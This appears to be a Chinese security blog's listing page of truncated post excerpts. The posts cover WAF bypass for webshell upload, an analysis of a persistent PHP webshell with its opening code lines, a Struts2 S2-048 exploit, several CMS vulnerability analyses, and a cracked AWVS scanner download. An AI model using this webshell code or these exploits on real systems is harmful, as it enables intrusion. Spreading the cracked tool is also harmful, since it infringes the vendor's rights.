waf bypass

工作原因对某站进行渗透,同样是工作原因我不能描述太细致,所以很怂的我只能靠语言文字来描述一下整个思路,再附上这次bypass的马遇到的防火墙是一个没怎么见过的种类,大致fuzz了一下,规则有:1. 检测内容,如果有<, >, _GET, _POST, _REQUEST, phpinfo()等函数直接ban掉2. 检测行为,如果对上传的页面以GET或POST方式传递数据,直接ban掉通过注入找到一个可用的用户以后(没管理),发现一个上传点。在试图上传php时发现,会对里面的内容进行检测

php不死马

在别人服务器上dump下了这个文件,分析了一下,是一个挺有意思的不死马,分析以后跟大家分享一下所以这算原创还是转载…毕竟不是我写的马 有啥不合适的我再改(这个不死马的主体是这个文件,不妨叫Trojan.php<?php @unlink($_SERVER['SCRIPT_FILENAME']); //删除自身 error_reporting(0); //禁用错误报告 ignore_user_abort(true); //忽略与用户的断开,用户浏览

struts2 S2-048远程代码执行漏洞exp

此次暴发的Struts2 s2-048的漏洞,影响不是太大,网上也已经有小伙伴分享了exp,我这里补充一个自己改的。喜欢的小伙伴拿去玩吧。struts2 s2-048 exp代码:#!/usr/bin/env python # -*- coding: utf-8 -*- # Date: 2017/7/10 

WordPress统计插件Statistics SQL注入漏洞分析

今天下午的时候,看到了这个漏洞,然后复现并分析了一下。可能是理解有误,有原文有一些出入,如果有错误请不吝指出。

一、漏洞条件:

  • 插件版本<12.0.8

  • 至少需要一个订阅者账号,我测试的时候发现当前账号需要编辑或者提交文章的权限的,如果这里有错误,请指出~

二、漏洞成因:

WP-Statistics插件允许用户在页面添加shortcode(简码)用于丰富页面统计功能。


通杀FineCMS5.0.8及版本以下getshell漏洞的

在文件finecms/dayrui/controllers/member/Api.php里面有一个down_file函数.可以从远程下载文件到本地服务器.public function down_file() {     $p = array();    $url = explode('&', $this->input->post('url'));&nbs

骑士人才系统4.2.3任意前台账号登录

它是用TP开发的,就简单分析一下~~~在它的Application\Home\Controller\MembersController.class.php中有如下代码:123456789101112131415161718192021222324252627282930313233343536373839404142434445464748public function varify_email(){    $token = I('get.toke

乌云引擎2.1

乌云已经关闭,但是上面有很多有用的帖子,历史漏洞,大家可以通过此工具来查看乌云历史提交。此工具仅用于学习交流。软件名:[箫启灵]乌云引擎版本:2.0运行环境:.NET4.5   系统W7以上。软件功能:搜索乌云历史漏洞。检测自身站点,提高自身站点防御。软件界面与功能截图:   下载地址:https://pan.baidu.com/s/1hsCCGJU

浅谈WAF绕过技巧

waf分类掌握绕过各类WAF可以说是渗透测试人员的一项基本技能,本文将WAF分为云WAF、硬件WAF、软件WAF、代码级WAF,分别从各自的特性来谈一些相关的绕过技巧,更侧重于针对基于规则类的WAF绕过技巧。云wafEg:加速乐目前CDN服务的功能是越来越多,安全性也越加强悍,用户的每个请求都会被发送到指定的CDN节点上,最后转发给真实站点。这个过程就好像加了一道关卡,这个关卡提供了缓存、加速、防御的特点。绕过关键:查询真实IP,若是直接访问服务器的IP就不经过CDN了。以下四点有助于绕过:1.

FineCMS v2.1.5前台一处XSS+CSRF可getshell

FineCMS一个XSS漏洞分析FineCMS是一套用CodeIgniter开发的中小型内容管理系统,目前有三个分支:1.x,2.x,5.x,这次分析的是2.x的最新版2.1.5一、用户输入既然是XSS,那么就一定有用户的输入以及输出。// controllers\member\InfoController.phppublic function avatarAction() {    if (empty($this->memberconfig[&#3

AWVS(Acunetix Web Vulnerability Scanner)v11.x 破解版下载

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!该破解版仅用于个人尝鲜测试使用用,请支持正版!Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。由于官方下载正版不敢提供直接升级了,所以只有等小伙伴分享出来,再把正版安装包放网盘吧,由于官方的试用版是不带有注册功能的,建议先卸载老版本,再通过本站下载

AWVS(Acunetix Web Vulnerability Scanner)v11.x 破解版